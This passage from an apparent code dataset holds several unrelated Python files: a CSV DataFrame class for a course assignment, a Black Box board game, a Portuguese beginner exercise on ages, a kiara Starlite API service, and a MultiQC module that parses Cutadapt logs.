col_collection:\r\n sum = sum + int(col)\r\n mean = sum/len(col_collection)\r\n return mean\r\n else:\r\n raise TypeError('The values in the column are strings and this operation cannot be performed.')\r\n\r\n\r\n @classmethod\r\n def sum(self, column):\r\n col_collection = [row[column] for row in df.data]\r\n col_type = self.get_column_type(column, col_collection)\r\n summation=0\r\n if col_type == int:\r\n for col in col_collection:\r\n summation = summation + int(col)\r\n return summation\r\n else:\r\n raise TypeError('The values in the column are strings and this operation cannot be performed.')\r\n\r\n @classmethod\r\n def std(self, column):\r\n col_collection = [row[column] for row in df.data]\r\n col_type = self.get_column_type(column, col_collection)\r\n sum = 0\r\n if (col_type == int):\r\n for col in col_collection:\r\n sum=sum+int(col)\r\n num_items = len(col_collection)\r\n mean = sum / num_items\r\n differences = [int(x) - mean for x in col_collection]\r\n sq_differences=0\r\n for d in differences:\r\n lis = [d ** 2 for d in differences]\r\n for item in lis:\r\n sq_differences = sq_differences + item\r\n return sqrt(sq_differences/num_items)\r\n else:\r\n raise TypeError('The values in the column are strings and this operation cannot be performed.')\r\n\r\n # Task 4\r\n @classmethod\r\n def add_rows(self, list_of_lists):\r\n length=len(df.data[0])\r\n for row in list_of_lists:\r\n if(len(row) == length):\r\n df.data.append(row)\r\n else:\r\n raise ValueError('The length of the row does not match to that of the existing data')\r\n df.data=[OrderedDict(zip(df.header, row)) for row in df.data]\r\n\r\n # Task 5\r\n @classmethod\r\n def add_columns(self,list_of_values,col_name):\r\n length_rows_data = len(df.data)\r\n length_values = len(list_of_values)\r\n if(length_rows_data == length_values):\r\n for index, headername in enumerate(df.header):\r\n df.data[index][col_name]=list_of_values[index]\r\n df.header.append(col_name)\r\n else:\r\n raise ValueError('The length of the column does not match to that of the existing data')\r\n\r\n # Task 2\r\n # Stripping whitespaces\r\n def __init__(self, list_of_lists, header=True):\r\n for each_list in list_of_lists:\r\n for index, word in enumerate(each_list):\r\n each_list[index] = word.strip()\r\n if header:\r\n # Assigning header\r\n self.header = list_of_lists[0]\r\n self.data = list_of_lists[1:]\r\n else:\r\n self.header = ['column' + str(index + 1) for index, column in enumerate(list_of_lists)]\r\n self.data = list_of_lists\r\n\r\n # Task 1\r\n # header name uniqueness\r\n\r\n is_unique = (all(list_of_lists[0].count(x) == 1 for x in list_of_lists[0]))\r\n if not is_unique:\r\n raise TypeError('Elements in the header are not unique!')\r\n self.data = [OrderedDict(zip(self.header, row)) for row in self.data]\r\n\r\n def __getitem__(self, item):\r\n # for rows only\r\n if isinstance(item, (int, slice)):\r\n return self.data[item]\r\n\r\n # for columns only\r\n elif isinstance(item, (str, unicode)):\r\n return [row[item] for row in self.data]\r\n\r\n # for rows and columns\r\n elif isinstance(item, tuple):\r\n if isinstance(item[0], list) or isinstance(item[1], list):\r\n if isinstance(item[0], list):\r\n row_collection = [row for index, row in enumerate(self.data) if index in item[0]]\r\n else:\r\n row_collection = self.data[item[0]]\r\n if isinstance(item[1], list):\r\n if all([isinstance(thing, int) for thing in item[1]]):\r\n return [[column_value for index, column_value in enumerate([value for value in row.itervalues()]) if index in 
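The hand-rolled `mean`/`std` methods above (note the inner loop that rebuilds `lis` on every pass) reimplement what the standard library already provides; `statistics.pstdev` matches the population formula `sqrt(sum(d^2)/n)` used in the record:

```python
# Sketch: population mean and standard deviation via the stdlib.
import statistics

values = [4, 8, 15, 16, 23, 42]
print(statistics.mean(values))    # arithmetic mean
print(statistics.pstdev(values))  # population standard deviation
```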
item[1]] for row in row_collection]\r\n elif all([isinstance(thing, (str, unicode)) for thing in item[1]]):\r\n return [[row[column_name] for column_name in item[1]] for row in row_collection]\r\n else:\r\n raise TypeError('Exception has occurred')\r\n else:\r\n return [[value for value in row.itervalues()][item[1]] for row in row_collection]\r\n else:\r\n if isinstance(item[1], (int, slice)):\r\n return [[value for value in row.itervalues()][item[1]] for row in self.data[item[0]]]\r\n elif isinstance(item[1], (str, unicode)):\r\n return [row[item[1]] for row in self.data[item[0]]]\r\n else:\r\n raise TypeError('I don\\'t know how to handle this...')\r\n\r\n # for lists of column names\r\n elif isinstance(item, list):\r\n return [[row[column_name] for column_name in item] for row in self.data]\r\n\r\n def get_rows_where_column_has_value(self, column_name, value, index_only=False):\r\n if index_only:\r\n return [index for index, row_value in enumerate(self[column_name]) if row_value==value]\r\n else:\r\n return [row for row in self.data if row[column_name] == value]\r\n\r\ninfile = open('SalesJan2009.csv')\r\nlines = infile.readlines()\r\nlines = lines[0].split('\\r')\r\ndata = [l.split(',') for l in lines]\r\nthings = lines[559].split('\"')\r\ndata[559] = things[0].split(',')[:-1] + [things[1].replace(',', '')] + things[-1].split(',')[1:]\r\ndf = DataFrame(list_of_lists=data)\r\n","repo_name":"abishekrathan/BIA-660---Web-Analytics","sub_path":"Assignment 2/DataFrame.py","file_name":"DataFrame.py","file_ext":"py","file_size_in_byte":9531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15440146635","text":"from copy import deepcopy\n\nclass BlackBoxGame:\n \"\"\"Represent a Black Box object\"\"\"\n\n def __init__(self, atoms):\n \"\"\"Initialize the 10x10 board and score. Accept atoms as a parameter and label atoms on board.\"\"\"\n self._board = [['.' 
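The `DataFrame` record keeps reusing one idiom — pairing the header with each data row via `zip` to get dict-like rows. In isolation, on toy data:

```python
# Sketch: turn a header plus raw rows into ordered per-row mappings.
from collections import OrderedDict

header = ["name", "year"]
rows = [["Ada", "1842"], ["Alan", "1936"]]
records = [OrderedDict(zip(header, row)) for row in rows]
print(records[0]["name"])  # -> Ada
```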
for _ in range(10)] for _ in range(10)]\n for atom in atoms:\n self._board[atom[0]][atom[1]] = 'a'\n self._score = 25\n self._atoms = len(atoms)\n self._disp = deepcopy(self._board)\n # a: atom\n # h: hit atom\n # r: wrong atom guess\n\n # x: already chosen enter/exit\n\n def is_border(self, row, col):\n \"\"\"Set the border for the board, used by guessing player for shooting rays\"\"\"\n corners = [(0, 0), (0, 9), (9, 0), (9, 9)]\n return (row == 0 or row == 9 or col == 0 or col == 9) and ((row, col) not in corners)\n\n def is_atom(self, row, col):\n \"\"\"Return position of the atom\"\"\"\n return self._board[row][col] in 'ah'\n\n def auto_increase(self, row, col):\n \"\"\"Increase row and column to direct ray to exit and get exit square\"\"\"\n if row == 0:\n return 1, 0\n\n if row == 9:\n return -1, 0\n\n if col == 0:\n return 0, 1\n\n if col == 9:\n return 0, -1\n\n def check_reflection(self, row, col):\n \"\"\"Check the next column row and column for an atom, return True if it exists, reflection\n condition is met \"\"\"\n corners_inc = [(1, 1), (1, -1), (-1, 1), (-1, -1)]\n for (i, j) in corners_inc:\n try:\n if self.is_atom(row + i, col + j):\n return True\n except:\n pass\n\n return False\n\n def check_deflection(self, row, col, i, j):\n \"\"\"Check the four side corners of the atoms to see if the ray is hitting it, return the exit ray as deflected\n 90 degree \"\"\"\n c1 = self.is_atom(row + 1, col + 1)\n c2 = self.is_atom(row - 1, col + 1)\n c3 = self.is_atom(row - 1, col - 1)\n c4 = self.is_atom(row + 1, col - 1)\n\n if (c1 and c2) or (c2 and c3) or (c3 and c4) or (\n c4 and c1): # if top right, bottom right, top left, or bottom left squares are atoms\n return -i, -j\n\n if c1 or c3: # if top left and bottom right corner squares are atoms\n return -j, -i\n\n if c2 or c4: # if top right and bottom left corner squares are atoms\n return j, i\n\n return i, j\n\n def modify_score(self, row, col, penalty):\n \"\"\"If the ray hits an atom, change the name of the atom to another letter to record a hit, else, subtract 5\n points from the total score \"\"\"\n if penalty == 5:\n if self._board[row][col] in 'rh' or self.is_border(row, col):\n return\n\n self._board[row][col] = 'r'\n else: # 'x' marks a square that has already been chosen\n if self._board[row][col] == 'x':\n return\n self._board[row][col] = 'x'\n\n self._score -= penalty\n\n def shoot_ray(self, row, col):\n \"\"\"Only allow shooting rays from border squares. Check for reflection and deflection, redirect ray as needed\"\"\"\n if not self.is_border(row, col): # return false if square is not in border squares\n return False\n\n self.modify_score(row, col, 1)\n if self.check_reflection(row, col): # return tuples of exit border square\n return row, col\n i, j = self.auto_increase(row, col)\n row += i\n col += j\n\n while not self.is_border(row, col):\n self._disp[row][col] = ' '\n if self.is_atom(row, col): # return none if no exit border square exists\n return None\n\n i, j = self.check_deflection(row, col, i, j)\n row += i\n col += j\n\n self.modify_score(row, col, 1)\n return row, col\n\n def guess_atom(self, row, col):\n \"\"\"Take guessed input as row and column and record hit if the guess is correct. 
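Worth noting about `check_reflection` above: the bare `try/except` around the neighbour probe does not actually guard the low edge, because negative indices wrap around in Python (`board[-1]` is the last row, not an error). An explicit bounds check avoids both problems; a sketch under the same 10x10 board assumption:

```python
# Sketch: bounds-checked diagonal probe instead of try/except.
SIZE = 10

def is_atom(board, row, col):
    return 0 <= row < SIZE and 0 <= col < SIZE and board[row][col] in "ah"

def check_reflection(board, row, col):
    corners = [(1, 1), (1, -1), (-1, 1), (-1, -1)]
    return any(is_atom(board, row + i, col + j) for i, j in corners)
```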
Subtract points for wrong\n guess \"\"\"\n if self._board[row][col] == 'a': # if guess is correct,mark square as h(hit)\n self._board[row][col] = 'h'\n self._atoms -= 1\n return True\n\n self.modify_score(row, col, 5)\n\n return False\n\n def get_score(self):\n \"\"\"Return the score\"\"\"\n return self._score\n\n def atoms_left(self):\n \"\"\"Return the remaining atoms\"\"\"\n return self._atoms\n\n def printBoard(self, stats):\n \"\"\"Print out the board to track if methods are working properly\"\"\"\n if stats == 1:\n board = deepcopy(self._board)\n else:\n board = deepcopy(self._disp)\n board[0][0] = board[9][9] = board[0][9] = board[9][0] = ' '\n print(\" 0 1 2 3 4 5 6 7 8 9\")\n for i in range(len(board)):\n print(i, end=' ')\n for j in range(len(board[0])):\n print(board[i][j], end='')\n if j == len(board[0]) - 1:\n print(' ' + str(i), end='')\n print(end=' ')\n if i == len(board) - 1:\n print(\"\\n 0 1 2 3 4 5 6 7 8 9\")\n else:\n print()\n print()\n print()\n self._disp = deepcopy(self._board)\n\n def feedback(self, stats):\n \"\"\"Return the board, get_score, and atom_left to provide feedback on progress\"\"\"\n self.printBoard(stats)\n print(f\"Score: {self.get_score()}\")\n print(f\"Atoms Left: {self.atoms_left()}\\n\\n\")\n","repo_name":"mhson281/PythonProjects","sub_path":"BlackBox/BlackBox.py","file_name":"BlackBox.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"30195547142","text":"'''#Desenvolva um programa que leia o nome, idade e sexo\r\nde 4 pessoas. No final do programa, mostre:\r\n- A média de idade do grupo\r\n- Qual é o nome do homem mais velho\r\n- Quantas mulheres têm menos de 21 anos'''\r\nprint('=' * 50)\r\nprint((' ' * 10), 'Programa \\033[1;4mDESAFIO56\\033[m iniciado.')\r\nprint('=' * 50)\r\n\r\nsoma = 0\r\nmais_velho = 0\r\nnovas = 0\r\nnome2 = 'vazio'\r\n\r\nprint('\\033[1;4mDados das pessoas\\033[m')\r\nfor cont in range(1,5):\r\n nome = str(input('Digite o nome da pessoa {}: '.format(cont)))\r\n idade = int(input('Digite a idade da pessoa {}: '.format(cont)))\r\n sexo = str(input('Digite o sexo da pesoa (M ou F) {}: '.format(cont)))\r\n print('-' * 37)\r\n soma += idade\r\n if cont == 1:\r\n if sexo == 'M':\r\n mais_velho = idade\r\n nome2 = nome\r\n else:\r\n if sexo == 'M':\r\n if idade > mais_velho:\r\n mais_velho = idade\r\n nome2 = nome\r\n else:\r\n if idade < 21:\r\n novas += 1\r\nprint('_' * 50)\r\n\r\nprint('A média das idades é \\033[33m{}\\033[m.\\n'\r\n 'O nome do homem mais velho é: \\033[33m{}\\033[m.\\n'\r\n 'A quantidade de mulheres abaixo de 21 é \\033[33m{}\\033[m.'\r\n .format((soma / 4), nome2, novas))\r\n\r\nprint('=' * 50)\r\nprint('Fim do programa.')\r\n","repo_name":"alex-gsantos/cursos_em_video","sub_path":"desafio56.py","file_name":"desafio56.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6800616999","text":"# -*- coding: utf-8 -*-\nfrom pathlib import Path\nfrom typing import Any, Dict, List, NoReturn, TypeVar, Union, cast\n\nimport structlog\nfrom jinja2 import Template as JinjaTemplate\nfrom jinja2 import TemplateNotFound as JinjaTemplateNotFound\nfrom orjson import (\n OPT_INDENT_2,\n OPT_NON_STR_KEYS,\n OPT_OMIT_MICROSECONDS,\n OPT_SERIALIZE_NUMPY,\n dumps,\n)\nfrom pydantic import DirectoryPath\nfrom pydantic_openapi_schema.v3_1_0.open_api import OpenAPI\nfrom ruamel.yaml import YAML\nfrom starlite import (\n 
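The Portuguese exercise above (read four people, then report the group's average age, the oldest man's name, and how many women are under 21) special-cases the first loop iteration to seed the oldest man; seeding with `None` removes that branch. A compact English sketch of the same aggregation:

```python
# Sketch: one-pass average, oldest man, and count of women under 21.
people = [("Ana", 19, "F"), ("Bruno", 44, "M"),
          ("Carla", 33, "F"), ("Davi", 51, "M")]

total = oldest_age = young_women = 0
oldest_name = None
for name, age, sex in people:
    total += age
    if sex == "M" and (oldest_name is None or age > oldest_age):
        oldest_name, oldest_age = name, age
    elif sex == "F" and age < 21:
        young_women += 1
print(total / len(people), oldest_name, young_women)
```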
CORSConfig,\n Provide,\n Request,\n Response,\n Starlite,\n State,\n StaticFilesConfig,\n TemplateConfig,\n)\nfrom starlite.enums import MediaType, OpenAPIMediaType\nfrom starlite.exceptions import ImproperlyConfiguredException, TemplateNotFoundException\nfrom starlite.status_codes import HTTP_204_NO_CONTENT, HTTP_304_NOT_MODIFIED\nfrom starlite.template import TemplateEngineProtocol\nfrom starlite.types import (\n ControllerRouterHandler,\n ExceptionHandlersMap,\n)\nfrom starlite.utils import create_exception_response\n\nfrom kiara.context import Kiara\nfrom kiara.interfaces.python_api import KiaraAPI\nfrom kiara.models import KiaraModel\nfrom kiara.registries.templates import TemplateRegistry\nfrom kiara.utils import is_debug, is_develop\nfrom kiara_plugin.service.defaults import KIARA_SERVICE_RESOURCES_FOLDER\nfrom kiara_plugin.service.openapi.controllers.context_info import (\n DataTypeControllerJson,\n KiaraContextControllerJson,\n)\nfrom kiara_plugin.service.openapi.controllers.jobs import JobControllerJson\nfrom kiara_plugin.service.openapi.controllers.modules import ModuleControllerJson\nfrom kiara_plugin.service.openapi.controllers.operations import (\n OperationControllerJson,\n)\nfrom kiara_plugin.service.openapi.controllers.pipeline import PipelineControllerJson\nfrom kiara_plugin.service.openapi.controllers.render import RenderControllerJson\nfrom kiara_plugin.service.openapi.controllers.values import (\n ValueControllerJson,\n)\nfrom kiara_plugin.service.openapi.controllers.workflows import WorkflowControllerJson\n\nT = TypeVar(\"T\")\n\n\nlogger = structlog.getLogger()\nyaml = YAML(typ=\"safe\")\n\n\nclass KiaraModelResponse(Response):\n @classmethod\n def serializer(cls, value: Any) -> Dict[str, Any]:\n if isinstance(value, KiaraModel):\n return value.dict()\n return super().serializer(value)\n\n def render(self, content: Any) -> bytes:\n \"\"\"\n Handles the rendering of content T into a bytes string.\n Args:\n content: An arbitrary value of type T\n\n Returns:\n An encoded bytes string\n \"\"\"\n try:\n if (\n content is None\n or content is NoReturn\n and (\n self.status_code < 100\n or self.status_code in {HTTP_204_NO_CONTENT, HTTP_304_NOT_MODIFIED}\n )\n ):\n return b\"\"\n if self.media_type == MediaType.JSON:\n return dumps(\n content,\n default=self.serializer,\n option=OPT_SERIALIZE_NUMPY\n | OPT_OMIT_MICROSECONDS\n | OPT_NON_STR_KEYS,\n )\n if isinstance(content, OpenAPI):\n content_dict = content.dict(by_alias=True, exclude_none=True)\n if self.media_type == OpenAPIMediaType.OPENAPI_YAML:\n encoded = yaml.dump(content_dict).encode(\"utf-8\")\n return cast(\"bytes\", encoded)\n return dumps(\n content_dict,\n option=OPT_INDENT_2 | OPT_OMIT_MICROSECONDS | OPT_NON_STR_KEYS,\n )\n return super().render(content)\n except (AttributeError, ValueError, TypeError) as e:\n raise ImproperlyConfiguredException(\n \"Unable to serialize response content\"\n ) from e\n\n\ndef logging_exception_handler(request: Request, exc: Exception) -> Response:\n \"\"\"\n Logs exception and returns appropriate response.\n\n Parameters\n ----------\n request : Request\n The request that caused the exception.\n exc :\n The exception caught by the Starlite exception handling middleware and passed to the\n callback.\n\n Returns\n -------\n Response\n \"\"\"\n logger.error(\"Application Exception\")\n return create_exception_response(exc)\n\n\n# def http_exception_handler(_: Request, exc: Exception) -> Response:\n# \"\"\"Default handler for exceptions subclassed from HTTPException\"\"\"\n# 
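The `render` method above leans on orjson's `default=` hook to serialize model objects that orjson does not handle natively; the hook in isolation, with a toy dataclass standing in for a kiara model:

```python
# Sketch: orjson fallback serializer for a non-native type.
import orjson
from dataclasses import dataclass, asdict

@dataclass
class Point:
    x: int
    y: int

def default(obj):
    if isinstance(obj, Point):
        return asdict(obj)  # plain dicts are natively serializable
    raise TypeError         # let orjson report anything else

print(orjson.dumps({"p": Point(1, 2)}, default=default,
                   option=orjson.OPT_INDENT_2).decode())
```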
status_code = HTTP_500_INTERNAL_SERVER_ERROR\n# detail = \"\"\n# if hasattr(exc, \"detail\"):\n# detail = exc.detail\n# if hasattr(exc, \"status_code\"):\n# status_code = exc.status_code\n# return Response(\n# media_type=MediaType.TEXT,\n# content=detail,\n# status_code=status_code,\n# )\n# def http_exception_handler(request: Request, exc: HTTPException):\n# return JSONResponse(\n# {\"detail\": exc.detail}, status_code=exc.status_code, headers=exc.headers\n# )\n\n\n# def custom_exception_handler(request: Request, exc: Exception):\n# model = InternalErrorModel.from_exception(exc)\n# return JSONResponse({\"detail\": model.dict()}, status_code=model.status)\n\n\nclass KiaraOpenAPIService:\n def __init__(self, kiara_api: KiaraAPI):\n\n self._kiara_api: KiaraAPI = kiara_api\n self._app: Union[Starlite, None] = None\n self._resources_base: Path = Path(KIARA_SERVICE_RESOURCES_FOLDER)\n\n def app(self) -> Starlite:\n if self._app is not None:\n return self._app\n\n from starlite import Router\n\n value_router = Router(path=\"/data\", route_handlers=[ValueControllerJson])\n operation_router = Router(\n path=\"/operations\", route_handlers=[OperationControllerJson]\n )\n job_router = Router(path=\"/jobs\", route_handlers=[JobControllerJson])\n module_router = Router(path=\"/modules\", route_handlers=[ModuleControllerJson])\n data_type_router = Router(\n path=\"/data-types\", route_handlers=[DataTypeControllerJson]\n )\n render_router = Router(path=\"/render\", route_handlers=[RenderControllerJson])\n workflow_router = Router(\n path=\"/workflows\", route_handlers=[WorkflowControllerJson]\n )\n pipeline_router = Router(\n path=\"/pipelines\", route_handlers=[PipelineControllerJson]\n )\n context_router = Router(\n path=\"/context\", route_handlers=[KiaraContextControllerJson]\n )\n\n # info_router_html = Router(\n # path=\"/html/info\", route_handlers=[OperationControllerHtml]\n # )\n # Router(path=\"/html/values\", route_handlers=[ValueControllerHtmx])\n # Router(path=\"/html/operations\", route_handlers=[OperationControllerHtmx])\n\n route_handlers: List[ControllerRouterHandler] = []\n route_handlers.append(value_router)\n route_handlers.append(module_router)\n route_handlers.append(data_type_router)\n route_handlers.append(operation_router)\n route_handlers.append(job_router)\n route_handlers.append(render_router)\n route_handlers.append(workflow_router)\n route_handlers.append(pipeline_router)\n route_handlers.append(context_router)\n\n # route_handlers.append(value_router_htmx)\n # route_handlers.append(operation_router_htmx)\n\n static_dir = self._resources_base / \"static\"\n\n static_file_config = [\n StaticFilesConfig(directories=[static_dir], path=\"/static\")\n ]\n self._template_registry: TemplateRegistry = TemplateRegistry()\n\n environment = self._template_registry.environment\n\n class KiaraTemplateEngine(TemplateEngineProtocol[JinjaTemplate]):\n \"\"\"Template engine using the default kiara template registry.\"\"\"\n\n def __init__(\n self, directory: Union[DirectoryPath, List[DirectoryPath]]\n ) -> None:\n super().__init__(directory=directory)\n self.engine = environment\n\n def get_template(self, name: str) -> JinjaTemplate:\n \"\"\"Loads the template with the name and returns it.\"\"\"\n try:\n return self.engine.get_template(name=name)\n except JinjaTemplateNotFound as exc:\n raise TemplateNotFoundException(template_name=name) from exc\n\n def engine_callback(jinja_engine: KiaraTemplateEngine) -> KiaraTemplateEngine:\n jinja_engine.engine.globals[\"kiara_api\"] = self._kiara_api\n 
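The `KiaraTemplateEngine` shim above mostly forwards to Jinja and converts its `TemplateNotFound`; the underlying Jinja call on its own (in-memory loader just for the sketch):

```python
# Sketch: Jinja2 template lookup with explicit missing-template handling.
from jinja2 import Environment, DictLoader, TemplateNotFound

env = Environment(loader=DictLoader({"hello.html": "Hello {{ name }}!"}))
try:
    template = env.get_template("hello.html")
    print(template.render(name="kiara"))  # -> Hello kiara!
except TemplateNotFound as exc:
    raise RuntimeError(f"missing template: {exc.name}") from exc
```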
return jinja_engine\n\n template_config: TemplateConfig = TemplateConfig(\n directory=[], engine=KiaraTemplateEngine, engine_callback=engine_callback\n )\n\n debug = is_debug() or is_develop()\n\n cors_config = CORSConfig()\n exception_handlers: ExceptionHandlersMap = {}\n # exception_handlers[HTTPException] = http_exception_handler\n # exception_handlers[Exception] = custom_exception_handler\n # if is_debug() or is_develop():\n # exception_handlers[HTTPException] = logging_exception_handler\n # exception_handlers[Exception] = http_exception_handler\n\n async def get_kiara_context(state: State) -> Kiara:\n if not hasattr(state, \"kiara\"):\n state.kiara = self._kiara_api.context\n return cast(Kiara, state.kiara)\n\n async def get_kiara_api(state: State) -> KiaraAPI:\n if not hasattr(state, \"kiara_api\"):\n state.kiara_api = self._kiara_api\n return cast(KiaraAPI, state.kiara_api)\n\n async def get_template_registry(state: State) -> TemplateRegistry:\n if not hasattr(state, \"template_registry\"):\n state.template_registry = self._template_registry\n return cast(TemplateRegistry, self._template_registry)\n\n dependencies = {\n \"kiara\": Provide(get_kiara_context),\n \"kiara_api\": Provide(get_kiara_api),\n \"template_registry\": Provide(get_template_registry),\n }\n\n self._app = Starlite(\n route_handlers=route_handlers,\n dependencies=dependencies,\n static_files_config=static_file_config,\n template_config=template_config,\n debug=debug,\n cors_config=cors_config,\n exception_handlers=exception_handlers,\n response_class=KiaraModelResponse,\n )\n return self._app # type: ignore\n","repo_name":"DHARPA-Project/kiara_plugin.service","sub_path":"src/kiara_plugin/service/openapi/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":10579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4921054963","text":"#!/usr/bin/env python\n\n\"\"\" MultiQC module to parse output from Cutadapt \"\"\"\n\nfrom __future__ import print_function\nimport logging\nimport re\nfrom distutils.version import StrictVersion\n\nfrom multiqc.plots import linegraph\nfrom multiqc.modules.base_module import BaseMultiqcModule\n\n# Initialise the logger\nlog = logging.getLogger(__name__)\n\nclass MultiqcModule(BaseMultiqcModule):\n \"\"\"\n Cutadapt module class, parses stderr logs.\n Also understands logs saved by Trim Galore!\n (which contain cutadapt logs)\n \"\"\"\n\n def __init__(self):\n\n # Initialise the parent object\n super(MultiqcModule, self).__init__(name='Cutadapt', anchor='cutadapt',\n href='https://cutadapt.readthedocs.io/',\n info=\"is a tool to find and remove adapter sequences, primers, poly-A\"\\\n \"tails and other types of unwanted sequence from your high-throughput\"\\\n \" sequencing reads.\")\n\n # Find and load any Cutadapt reports\n self.cutadapt_data = dict()\n self.cutadapt_length_counts = dict()\n self.cutadapt_length_exp = dict()\n self.cutadapt_length_obsexp = dict()\n\n for f in self.find_log_files('cutadapt', filehandles=True):\n self.parse_cutadapt_logs(f)\n\n # Filter to strip out ignored sample names\n self.cutadapt_data = self.ignore_samples(self.cutadapt_data)\n\n if len(self.cutadapt_data) == 0:\n raise UserWarning\n\n log.info(\"Found {} reports\".format(len(self.cutadapt_data)))\n\n # Write parsed report data to a file\n self.write_data_file(self.cutadapt_data, 'multiqc_cutadapt')\n\n # Basic Stats Table\n self.cutadapt_general_stats_table()\n\n # Trimming Length Profiles\n 
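The three async providers above (`get_kiara_context`, `get_kiara_api`, `get_template_registry`) all follow one cache-on-first-use pattern against the shared state object; reduced to its core:

```python
# Sketch: lazily cache an expensive object as an attribute on a state holder.
class State:
    pass

def get_service(state):
    if not hasattr(state, "service"):
        state.service = object()  # stands in for an expensive construction
    return state.service

s = State()
assert get_service(s) is get_service(s)  # second call reuses the cache
```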
self.cutadapt_length_trimmed_plot()\n\n\n def parse_cutadapt_logs(self, f):\n \"\"\" Go through log file looking for cutadapt output \"\"\"\n fh = f['f']\n regexes = {\n '1.7': {\n 'bp_processed': \"Total basepairs processed:\\s*([\\d,]+) bp\",\n 'bp_written': \"Total written \\(filtered\\):\\s*([\\d,]+) bp\",\n 'quality_trimmed': \"Quality-trimmed:\\s*([\\d,]+) bp\",\n 'r_processed': \"Total reads processed:\\s*([\\d,]+)\",\n 'r_with_adapters': \"Reads with adapters:\\s*([\\d,]+)\"\n },\n '1.6': {\n 'r_processed': \"Processed reads:\\s*([\\d,]+)\",\n 'bp_processed': \"Processed bases:\\s*([\\d,]+) bp\",\n 'r_trimmed': \"Trimmed reads:\\s*([\\d,]+)\",\n 'quality_trimmed': \"Quality-trimmed:\\s*([\\d,]+) bp\",\n 'bp_trimmed': \"Trimmed bases:\\s*([\\d,]+) bp\",\n 'too_short': \"Too short reads:\\s*([\\d,]+)\",\n 'too_long': \"Too long reads:\\s*([\\d,]+)\",\n }\n }\n s_name = None\n cutadapt_version = '1.7'\n log_section = None\n for l in fh:\n # New log starting\n if 'cutadapt' in l:\n s_name = None\n c_version = re.match(r'This is cutadapt ([\\d\\.]+)', l)\n if c_version:\n try:\n assert(StrictVersion(c_version.group(1)) <= StrictVersion('1.6'))\n cutadapt_version = '1.6'\n except:\n cutadapt_version = '1.7'\n c_version_old = re.match(r'cutadapt version ([\\d\\.]+)', l)\n if c_version_old:\n try:\n assert(StrictVersion(c_version.group(1)) <= StrictVersion('1.6'))\n cutadapt_version = '1.6'\n except:\n # I think the pattern \"cutadapt version XX\" is only pre-1.6?\n cutadapt_version = '1.6'\n # Get sample name from end of command line params\n if l.startswith('Command line parameters'):\n s_name = l.split()[-1]\n # Manage case where sample name is '-' (reading from stdin)\n if s_name == '-':\n s_name = f['s_name']\n else:\n s_name = self.clean_s_name(s_name, f['root'])\n if s_name in self.cutadapt_data:\n log.debug(\"Duplicate sample name found! Overwriting: {}\".format(s_name))\n self.cutadapt_data[s_name] = dict()\n\n if s_name is not None:\n self.add_data_source(f, s_name)\n\n # Search regexes for overview stats\n for k, r in regexes[cutadapt_version].items():\n match = re.search(r, l)\n if match:\n self.cutadapt_data[s_name][k] = int(match.group(1).replace(',', ''))\n\n # Starting a new section\n if '===' in l:\n log_section = l.strip().strip('=').strip()\n\n # Histogram showing lengths trimmed\n if 'length' in l and 'count' in l and 'expect' in l:\n plot_sname = s_name\n if log_section is not None:\n plot_sname = '{} - {}'.format(s_name, log_section)\n self.cutadapt_length_counts[plot_sname] = dict()\n self.cutadapt_length_exp[plot_sname] = dict()\n self.cutadapt_length_obsexp[plot_sname] = dict()\n # Nested loop to read this section while the regex matches\n for l in fh:\n r_seqs = re.search(\"^(\\d+)\\s+(\\d+)\\s+([\\d\\.]+)\", l)\n if r_seqs:\n a_len = int(r_seqs.group(1))\n self.cutadapt_length_counts[plot_sname][a_len] = int(r_seqs.group(2))\n self.cutadapt_length_exp[plot_sname][a_len] = float(r_seqs.group(3))\n if float(r_seqs.group(3)) > 0:\n self.cutadapt_length_obsexp[plot_sname][a_len] = float(r_seqs.group(2)) / float(r_seqs.group(3))\n else:\n # Cheating, I know. 
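The log parser above keeps a per-version regex table and strips thousands separators before calling `int()`; that extraction step, isolated on one sample line:

```python
# Sketch: pull a comma-grouped count out of a cutadapt-style log line.
import re

line = "Total basepairs processed:    1,234,567 bp"
match = re.search(r"Total basepairs processed:\s*([\d,]+) bp", line)
if match:
    print(int(match.group(1).replace(",", "")))  # -> 1234567
```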
Infinity is difficult to plot.\n self.cutadapt_length_obsexp[plot_sname][a_len] = float(r_seqs.group(2))\n else:\n break\n\n # Calculate a few extra numbers of our own\n for s_name, d in self.cutadapt_data.items():\n if 'bp_processed' in d and 'bp_written' in d:\n self.cutadapt_data[s_name]['percent_trimmed'] = (float(d['bp_processed'] - d['bp_written']) / d['bp_processed']) * 100\n elif 'bp_processed' in d and 'bp_trimmed' in d:\n self.cutadapt_data[s_name]['percent_trimmed'] = ((float(d.get('bp_trimmed', 0)) + float(d.get('quality_trimmed', 0))) / d['bp_processed']) * 100\n\n\n\n def cutadapt_general_stats_table(self):\n \"\"\" Take the parsed stats from the Cutadapt report and add it to the\n basic stats table at the top of the report \"\"\"\n\n headers = {}\n headers['percent_trimmed'] = {\n 'title': '% Trimmed',\n 'description': '% Total Base Pairs trimmed',\n 'max': 100,\n 'min': 0,\n 'suffix': '%',\n 'scale': 'RdYlBu-rev'\n }\n self.general_stats_addcols(self.cutadapt_data, headers)\n\n\n def cutadapt_length_trimmed_plot (self):\n \"\"\" Generate the trimming length plot \"\"\"\n\n description = 'This plot shows the number of reads with certain lengths of adapter trimmed. \\n\\\n Obs/Exp shows the raw counts divided by the number expected due to sequencing errors. A defined peak \\n\\\n may be related to adapter length. See the \\n\\\n cutadapt documentation \\n\\\n for more information on how these numbers are generated.'\n\n pconfig = {\n 'id': 'cutadapt_plot',\n 'title': 'Cutadapt: Lengths of Trimmed Sequences',\n 'ylab': 'Counts',\n 'xlab': 'Length Trimmed (bp)',\n 'xDecimals': False,\n 'ymin': 0,\n 'tt_label': '{point.x} bp trimmed: {point.y:.0f}',\n 'data_labels': [{'name': 'Counts', 'ylab': 'Count'},\n {'name': 'Obs/Exp', 'ylab': 'Observed / Expected'}]\n }\n\n self.add_section(\n description = description,\n plot = linegraph.plot([self.cutadapt_length_counts, self.cutadapt_length_obsexp], pconfig)\n 